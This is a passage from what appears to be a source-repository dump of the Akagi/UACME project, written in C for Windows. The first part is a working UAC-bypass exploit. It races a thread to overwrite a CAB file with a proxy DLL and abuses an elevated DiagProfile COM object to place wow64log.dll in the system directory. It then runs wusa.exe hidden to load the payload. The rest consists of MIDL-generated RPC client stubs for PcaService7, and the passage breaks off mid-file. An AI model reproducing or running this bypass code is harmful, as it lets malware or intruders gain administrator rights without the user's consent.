(TRUE) {\n        if (TerminateOverwriteThread) {\n            break;\n        }\n        hTargetFile = CreateFile(params.TargetFile,\n            GENERIC_WRITE,\n            FILE_SHARE_VALID_FLAGS,\n            NULL,\n            OPEN_EXISTING,\n            FILE_ATTRIBUTE_NORMAL,\n            NULL);\n\n        if (hTargetFile != INVALID_HANDLE_VALUE) {\n            WriteFile(hTargetFile, params.ProxyDll, params.ProxyDllSize, &bytesIO, NULL);\n            CloseHandle(hTargetFile);\n        }\n    }\n\n    supHeapFree(Parameter);\n    CloseHandle(OverwriteThreadHandle);\n    OverwriteThreadHandle = NULL;\n    return 0;\n}\n\n/*\n* ucmxTriggerDiagProfile\n*\n* Purpose:\n*\n* Allocate elevated diag profile object and call SaveDirectoryAsCab method.\n*\n*/\nHRESULT ucmxTriggerDiagProfile(\n    _In_ LPCWSTR lpDirectory\n)\n{\n    HRESULT r = E_FAIL;\n\n    IElevatedFactoryServer* pElevatedServer = NULL;\n    IUnknown* pUnknown = NULL;\n    IDispatch* 
pDispatch = NULL;\n\n    CLSID clsid;\n\n    DISPID dispid;\n    DISPPARAMS dispatchParams;\n    LPOLESTR methodName = NULL;\n\n    VARIANT result;\n    VARIANTARG values[2];\n    WCHAR szTarget[MAX_PATH * 2];\n\n    values[0].bstrVal = NULL;\n    values[1].bstrVal = NULL;\n\n    do {\n        \n        methodName = SysAllocString(L\"SaveDirectoryAsCab\");\n        if (methodName == NULL)\n            break;\n\n        r = ucmxGetElevatedFactoryServerObject(\n            T_CLSID_VFServerDiagCpl,\n            (VOID**)&pElevatedServer);\n\n        if (r != S_OK)\n            break;\n\n        ucmConsolePrint(TEXT(\"[+] Elevated Factory Server object allocated\\r\\n\"));\n\n        r = CLSIDFromString(T_CLSID_DiagnosticProfile, &clsid);\n        if (r != S_OK)\n            break;\n\n        r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer,\n            &clsid,\n            &IID_IUnknown,\n            (void**)&pUnknown);\n\n        if (r != S_OK)\n            break;\n\n        ucmConsolePrint(TEXT(\"[+] Elevated DiagProfile object allocated\\r\\n\"));\n\n        if (pUnknown == NULL) {\n            r = E_FAIL;\n            break;\n        }\n\n        r = pUnknown->lpVtbl->QueryInterface(pUnknown, &IID_IDispatch, (VOID**)&pDispatch);\n\n        if (r != S_OK)\n            break;\n\n        ucmConsolePrint(TEXT(\"[+] QueryInterface success\\r\\n\"));\n\n        if (pDispatch == NULL) {\n            r = E_FAIL;\n            break;\n        }\n\n        r = pDispatch->lpVtbl->GetIDsOfNames(pDispatch, &IID_NULL, &methodName, 1, LOCALE_USER_DEFAULT, &dispid);\n        if (r != S_OK)\n            break;\n\n        ucmConsolePrint(TEXT(\"[+] Dispatch->GetIDsOfNames success\\r\\n\"));\n\n        RtlSecureZeroMemory(&dispatchParams, sizeof(dispatchParams));\n\n        VariantInit(&values[0]);\n        VariantInit(&values[1]);\n\n        _strcpy(szTarget, g_ctx->szSystemDirectory);\n        _strcat(szTarget, WOW64LOG_DLL);\n\n        values[0].vt = 
VT_BSTR;\n        values[0].bstrVal = SysAllocString(szTarget);\n        if (values[0].bstrVal == NULL) {\n            r = E_OUTOFMEMORY;\n            break;\n        }\n\n        values[1].vt = VT_BSTR;\n        values[1].bstrVal = SysAllocString(lpDirectory);\n        if (values[1].bstrVal == NULL) {\n            r = E_OUTOFMEMORY;\n            break;\n        }\n\n        dispatchParams.cArgs = 2;\n        dispatchParams.rgvarg = values;\n\n        VariantInit(&result);\n\n        r = pDispatch->lpVtbl->Invoke(pDispatch,\n            dispid,\n            &IID_NULL,\n            LOCALE_USER_DEFAULT,\n            DISPATCH_METHOD,\n            &dispatchParams,\n            &result,\n            NULL,\n            NULL);\n\n        ucmConsolePrintValueUlong(TEXT(\"[+] Dispatch->Invoke\"), r, TRUE);\n\n        VariantClear(&result);\n\n    } while (FALSE);\n\n    if (values[0].bstrVal) SysFreeString(values[0].bstrVal);\n    if (values[1].bstrVal) SysFreeString(values[1].bstrVal);\n\n    if (methodName)\n        SysFreeString((BSTR)methodName);\n\n    if (pDispatch) {\n        pDispatch->lpVtbl->Release(pDispatch);\n    }\n\n    if (pUnknown) {\n        pUnknown->lpVtbl->Release(pUnknown);\n    }\n\n    if (pElevatedServer != NULL) {\n        pElevatedServer->lpVtbl->Release(pElevatedServer);\n    }\n\n    return r;\n}\n\n/*\n* ucmVFServerDiagProfileMethod\n*\n* Purpose:\n*\n* Bypass UAC by using Elevated Factory Server COM object.\n*\n* 1. Allocate Elevated Factory Server COM object and use it to create a Diag Profiler object.\n* 2. 
Use Diag Profiler object to move files into protected area via race condition.\n*\n*/\nNTSTATUS ucmVFServerDiagProfileMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT hr_init, r;\n    DWORD dwLastError;\n    ULONG retryCount = 0;\n\n    UCMX_OVP* ovParams = NULL;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    ucmConsolePrint(TEXT(\"[+] Entering ucmVFServerDiagProfileMethod\\r\\n\"));\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        //\n        // Create %temp%\\hui32 directory.\n        //\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, THEOLDNEWTHING);\n        if (!CreateDirectory((LPCWSTR)&szBuffer, NULL)) {\n            dwLastError = GetLastError();\n            if (dwLastError != ERROR_ALREADY_EXISTS) {\n                ucmConsolePrintValueUlong(TEXT(\"[!] Could not create directory\\r\\n\"), dwLastError, TRUE);\n                break;\n            }\n        }\n\n        ovParams = (UCMX_OVP*)supHeapAlloc(sizeof(UCMX_OVP));\n        if (ovParams == NULL)\n            break;\n\n        ovParams->ProxyDll = ProxyDll;\n        ovParams->ProxyDllSize = ProxyDllSize;\n\n        _strcpy(ovParams->TargetFile, szBuffer);\n        supPathAddBackSlash(ovParams->TargetFile);\n        _strcat(ovParams->TargetFile, TEXT(\"results.cab\"));\n\n        OverwriteThreadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxOverwriteThread, (PVOID)ovParams, 0, NULL);\n        if (OverwriteThreadHandle == NULL) {\n            ucmConsolePrintValueUlong(TEXT(\"[!] Cannot create worker thread\\r\\n\"), GetLastError(), TRUE);\n            supHeapFree(ovParams);\n            break;\n        }\n\n        SetThreadPriority(OverwriteThreadHandle, THREAD_PRIORITY_TIME_CRITICAL);\n\n        r = ucmxTriggerDiagProfile(szBuffer);\n        if (FAILED(r)) {\n            ucmConsolePrintValueUlong(TEXT(\"[!] 
DiagProfile does not trigger\\r\\n\"), r, TRUE);\n            break;\n        }\n\n        _InterlockedExchange((LONG*)&TerminateOverwriteThread, TRUE);\n\n        _strcpy(szBuffer, g_ctx->szSystemDirectory);\n        _strcat(szBuffer, WOW64LOG_DLL);\n\n        do {\n\n            if (PathFileExists(szBuffer)) {\n                ucmConsolePrint(TEXT(\"[+] Payload file installed\\r\\n\"));\n                break;\n            }\n            else\n                Sleep(1000);\n\n        } while (++retryCount < 10);\n\n        _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n        _strcat(szBuffer, SYSWOW64_DIR);\n        _strcat(szBuffer, WUSA_EXE);\n\n        if (supRunProcess2(szBuffer,\n            NULL,\n            NULL,\n            SW_HIDE,\n            5000))\n        {\n            ucmConsolePrint(TEXT(\"[+] Target executed\\r\\n\"));\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    if (OverwriteThreadHandle) {\n        TerminateThread(OverwriteThreadHandle, 0);\n        CloseHandle(OverwriteThreadHandle);\n        OverwriteThreadHandle = NULL;\n    }\n\n    //\n    // Cleanup.\n    //\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w7/pcasvc7.acf",
    "content": "[\n\texplicit_handle\n]\ninterface PcaService7\n{\n\tRAiNotifyUserCallbackExceptionProcess();\n}\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w7/pcasvc7.idl",
    "content": "[\n\tuuid(0767a036-0d22-48aa-ba69-b619480f38cb),\n\tversion(1.0),\n]\ninterface PcaService7\n{\n\tlong RAiNotifyUserCallbackExceptionProcess(\n\t\thandle_t bindingHandle,\n\t\t[in][string] wchar_t* exePathName,\n\t\t[in]long unknown0,\n\t\t[in]long processId\n\t);\n}\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w7/x64/pcasvc7_64.c",
    "content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning suppression added\n3. See pcasvc7__MIDL_ProcFormatString definition \"Modified\" comment\n\n*/\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#if defined(_M_AMD64)\n\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 )  /* redefine extern to static */\n#pragma warning( disable: 4232 )  /* dllimport identity*/\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\n\n#include <string.h>\n\n#include \"pcasvc7_64.h\"\n\n#define TYPE_FORMAT_STRING_SIZE   7                                 \n#define PROC_FORMAT_STRING_SIZE   55                                \n#define EXPR_FORMAT_STRING_SIZE   1                                 \n#define TRANSMIT_AS_TABLE_SIZE    0            \n#define WIRE_MARSHAL_TABLE_SIZE   0            \n\ntypedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\n    } pcasvc7_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\n    } pcasvc7_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING\n    {\n    long          Pad;\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\n    } pcasvc7_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax 
= \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;\nextern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;\nextern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE   0            \n\n\n/* Standard interface: PcaService7, ver. 1.0,\n   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =\n    {\n    sizeof(RPC_CLIENT_INTERFACE),\n    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n    0,\n    0,\n    0,\n    0,\n    0,\n    0x00000000\n    };\nRPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService7_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;\n\n\nlong RAiNotifyUserCallbackExceptionProcess( \n    handle_t bindingHandle,\n    /* [string][in] */ wchar_t *exePathName,\n    /* [in] */ long unknown0,\n    /* [in] */ long processId)\n{\n\n    CLIENT_CALL_RETURN _RetVal;\n\n    _RetVal = NdrClientCall2(\n                  ( PMIDL_STUB_DESC  )&PcaService7_StubDesc,\n                  (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],\n                  bindingHandle,\n                  exePathName,\n                  unknown0,\n                  processId);\n    return ( long  )_RetVal.Simple;\n    \n}\n\n\n#if !defined(__RPC_WIN64__)\n#error  Invalid build platform for this stub.\n#endif\n\nstatic const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =\n    {\n        0,\n        {\n\n\t/* Procedure RAiNotifyUserCallbackExceptionProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags:  */\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/*  6 
*/\tNdrFcShort( 0x4 ),\t/* 4 */ /* N.B. Modified */\n/*  8 */\tNdrFcShort( 0x28 ),\t/* X64 Stack size/offset = 40 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x10 ),\t/* 16 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags:  clt must size, has return, has ext, */\n\t\t\t0x4,\t\t/* 4 */\n/* 20 */\t0xa,\t\t/* 10 */\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter exePathName */\n\n/* 30 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\n/* 34 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\n\n\t/* Parameter unknown0 */\n\n/* 36 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 38 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\n/* 40 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter processId */\n\n/* 42 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\n/* 46 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 48 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\n/* 50 */\tNdrFcShort( 0x20 ),\t/* X64 Stack size/offset = 32 */\n/* 52 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =\n    {\n        0,\n        {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  2 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/*  4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const unsigned short PcaService7_FormatStringOffsetTable[] =\n    {\n    0\n    };\n\n\nstatic const 
MIDL_STUB_DESC PcaService7_StubDesc = \n    {\n    (void *)& PcaService7___RpcClientInterface,\n    MIDL_user_allocate,\n    MIDL_user_free,\n    &PcaService7__MIDL_AutoBindHandle,\n    0,\n    0,\n    0,\n    0,\n    pcasvc7__MIDL_TypeFormatString.Format,\n    1, /* -error bounds_check flag */\n    0x50002, /* Ndr library version */\n    0,\n    0x8010272, /* MIDL Version 8.1.626 */\n    0,\n    0,\n    0,  /* notify & notify_flag routine table */\n    0x1, /* MIDL flag */\n    0, /* cs routines */\n    0,   /* proxy/server info */\n    0\n    };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* defined(_M_AMD64)*/\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w7/x64/pcasvc7_64.h",
    "content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n\n\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of <rpcndr.h>\n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc7_64_h__\n#define __pcasvc7_64_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService7_INTERFACE_DEFINED__\n#define __PcaService7_INTERFACE_DEFINED__\n\n/* interface PcaService7 */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiNotifyUserCallbackExceptionProcess( \n    handle_t bindingHandle,\n    /* [string][in] */ wchar_t *exePathName,\n    /* [in] */ long unknown0,\n    /* [in] */ long processId);\n\n\n\nextern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;\n#endif /* __PcaService7_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes 
*/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.c",
    "content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning suppression added\n3. See pcasvc7__MIDL_ProcFormatString definition \"Modified\" comment\n\n*/\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)\n\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 )  /* redefine extern to static */\n#pragma warning( disable: 4232 )  /* dllimport identity*/\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\n#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */\n\n#pragma optimize(\"\", off ) \n\n#include <string.h>\n\n#include \"pcasvc7_32.h\"\n\n#define TYPE_FORMAT_STRING_SIZE   7                                 \n#define PROC_FORMAT_STRING_SIZE   53                                \n#define EXPR_FORMAT_STRING_SIZE   1                                 \n#define TRANSMIT_AS_TABLE_SIZE    0            \n#define WIRE_MARSHAL_TABLE_SIZE   0            \n\ntypedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\n    } pcasvc7_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\n    } pcasvc7_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING\n    {\n    long          Pad;\n    
unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\n    } pcasvc7_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;\nextern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;\nextern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE   0            \n\n\n/* Standard interface: PcaService7, ver. 1.0,\n   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =\n    {\n    sizeof(RPC_CLIENT_INTERFACE),\n    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n    0,\n    0,\n    0,\n    0,\n    0,\n    0x00000000\n    };\nRPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService7_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;\n\n\nlong RAiNotifyUserCallbackExceptionProcess( \n    handle_t bindingHandle,\n    /* [string][in] */ wchar_t *exePathName,\n    /* [in] */ long unknown0,\n    /* [in] */ long processId)\n{\n\n    CLIENT_CALL_RETURN _RetVal;\n\n    _RetVal = NdrClientCall2(\n                  ( PMIDL_STUB_DESC  )&PcaService7_StubDesc,\n                  (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],\n                  ( unsigned char * )&bindingHandle);\n    return ( long  )_RetVal.Simple;\n    \n}\n\n\n#if !defined(__RPC_WIN32__)\n#error  Invalid build platform for this stub.\n#endif\n\n#if !(TARGET_IS_NT50_OR_LATER)\n#error You need Windows 2000 or later to run this stub because it uses these features:\n#error   /robust command line switch.\n#error However, your C/C++ 
compilation flags indicate you intend to run this app on earlier systems.\n#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.\n#endif\n\n\nstatic const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =\n    {\n        0,\n        {\n\n\t/* Procedure RAiNotifyUserCallbackExceptionProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags:  */\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/*  6 */\tNdrFcShort( 0x4 ),\t/* 4 */\n/*  8 */\tNdrFcShort( 0x14 ),\t/* x86 Stack size/offset = 20 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* x86 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x10 ),\t/* 16 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags:  clt must size, has return, has ext, */\n\t\t\t0x4,\t\t/* 4 */\n/* 20 */\t0x8,\t\t/* 8 */\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter exePathName */\n\n/* 28 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 30 */\tNdrFcShort( 0x4 ),\t/* x86 Stack size/offset = 4 */\n/* 32 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\n\n\t/* Parameter unknown0 */\n\n/* 34 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 36 */\tNdrFcShort( 0x8 ),\t/* x86 Stack size/offset = 8 */\n/* 38 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter processId */\n\n/* 40 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 42 */\tNdrFcShort( 0xc ),\t/* x86 Stack size/offset = 12 */\n/* 44 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 46 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\n/* 48 */\tNdrFcShort( 0x10 ),\t/* x86 Stack size/offset = 16 */\n/* 50 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const pcasvc7_MIDL_TYPE_FORMAT_STRING 
pcasvc7__MIDL_TypeFormatString =\n    {\n        0,\n        {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  2 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/*  4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const unsigned short PcaService7_FormatStringOffsetTable[] =\n    {\n    0\n    };\n\n\nstatic const MIDL_STUB_DESC PcaService7_StubDesc = \n    {\n    (void *)& PcaService7___RpcClientInterface,\n    MIDL_user_allocate,\n    MIDL_user_free,\n    &PcaService7__MIDL_AutoBindHandle,\n    0,\n    0,\n    0,\n    0,\n    pcasvc7__MIDL_TypeFormatString.Format,\n    1, /* -error bounds_check flag */\n    0x50002, /* Ndr library version */\n    0,\n    0x8010272, /* MIDL Version 8.1.626 */\n    0,\n    0,\n    0,  /* notify & notify_flag routine table */\n    0x1, /* MIDL flag */\n    0, /* cs routines */\n    0,   /* proxy/server info */\n    0\n    };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.h",
    "content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n\n\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of <rpcndr.h>\n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc7_32_h__\n#define __pcasvc7_32_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService7_INTERFACE_DEFINED__\n#define __PcaService7_INTERFACE_DEFINED__\n\n/* interface PcaService7 */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiNotifyUserCallbackExceptionProcess( \n    handle_t bindingHandle,\n    /* [string][in] */ wchar_t *exePathName,\n    /* [in] */ long unknown0,\n    /* [in] */ long processId);\n\n\n\nextern 